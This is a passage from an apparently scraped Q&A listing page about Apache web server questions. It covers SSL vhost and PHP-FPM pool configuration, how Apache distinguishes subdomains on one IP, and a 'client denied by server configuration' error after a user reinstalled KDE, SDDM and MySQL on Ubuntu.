	SSLEngine on
	SSLCertificateFile /etc/ssl/certs/www.site.com.crt
	SSLCertificateKeyFile   /etc/ssl/private/www.site.com.key

		SSLOptions +StdEnvVars

		SSLOptions +StdEnvVars

		SetHandler "proxy:unix:/run/php/php7.4-fpm-www_site_com.sock|fcgi://localhost"
```

/etc/php/7.4/fpm/php-fpm.conf

```
[global]
pid = /run/php/php7.4-fpm.pid
error_log = "syslog"
syslog.ident = php-fpm
include=/etc/php/7.4/fpm/pool.d/*.conf
```

/etc/php/7.4/fpm/pool.d/www_site_com.conf

```
[www.site.com]
user = user_site1
group = user_site1
listen = /run/php/php7.4-fpm-www_site_com.sock
listen.owner = user_site1
listen.group = www-data
pm = dynamic
pm.max_children = 5
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3
```
MrL (21 rep)
Mar 16, 2023, 12:15 PM
2 votes
2 answers
1057 views
How is Apache webserver able to detect CNAME
I was quite curious how the Apache web server can detect a subdomain even when all the subdomains point to the same IP address, since my understanding is that an IP address cannot have a subdomain, and every domain name ultimately resolves to an IP address.

Example:

example1.domain.com resolves to => 192.24.17.65 takes you to => example1 webpage

example2.domain.com resolves to => 192.24.17.65 takes you to => example2 webpage
satyamfifa (23 rep)
May 2, 2021, 10:49 PM • Last activity: Feb 7, 2023, 04:14 PM
1 votes
1 answers
105 views
client denied by server configuration after reinstalling KDE Desktop and SDDM
System info:

```
Ubuntu 22.04
KDE-Plasma-Version: 5.24.6
KDE-Frameworks-Version: 5.92.0
Qt-Version: 5.15.3
Kernel-Version: 5.15.0-10048-tuxedo (64-bit)
Apache 2.4.52
```

During a system cleanup, I seem to have uninstalled something that caused the following error to occur after a reboot.

```
The current theme cannot be loaded due to the errors below, please select another theme.
file///usr/share/sddm/breeze/main.qml: No such file or directory
```

In the terminal I then executed the following commands

```
sudo apt-get install --reinstall sddm-theme-breeze
sudo apt-get install --reinstall sddm
sudo dpkg-reconfigure sddm
sudo apt install --reinstall kde-plasma-desktop
sudo apt install --reinstall kde-standard

sudo systemctl unmask packagekit.service
sudo systemctl start packagekit.service
sudo systemctl unmask mysql.service
sudo systemctl unmask apache2.service
```

but mysql did not work so I had to reinstall it

```
sudo apt-get --purge mysql*
sudo apt install --reinstall mysql
sudo apt install mysql-server

sudo chmod o+x $HOME
```

After that the login and the KDE desktop worked again. However, I now have a problem with the local web server. When I call a local page I get a 500 error in the browser.

vhost

```
        ServerName local.mydomain.de:443
        ServerAdmin webmaster@localhost

        DocumentRoot /home/user/_projects/mydomain/webroot/

                Options -Indexes +FollowSymLinks +MultiViews
                AllowOverride All
                Order allow,deny
                Allow from all
                Require all granted

        SSLEngine on
        SSLCertificateFile    /home/user/local.mydomain.de+3.pem
        SSLCertificateKeyFile /home/user/local.mydomain.de+3-key.pem

        ErrorLog /var/log/apache2/error-mydomain.log
        LogLevel warn
        CustomLog /var/log/apache2/access-mydomain.log combined
        ServerSignature Off
```

Checking the apache2 error.log gives me this message

```
[authz_core:error] [pid 8214] [client 127.0.0.1:41014] AH01630: client denied by server configuration: /home/user/_projects/
apache2: Syntax error on line 225 of /etc/apache2/apache2.conf: Could not open configuration file /etc/apache2/sites-enabled/mydomain.conf: Permission denied
Action '-M' failed
```

Now I can't figure out how to fix the problem.
magic.77 (141 rep)
Oct 8, 2022, 01:32 PM • Last activity: Oct 8, 2022, 04:32 PM
Showing page 1 of 20 total questions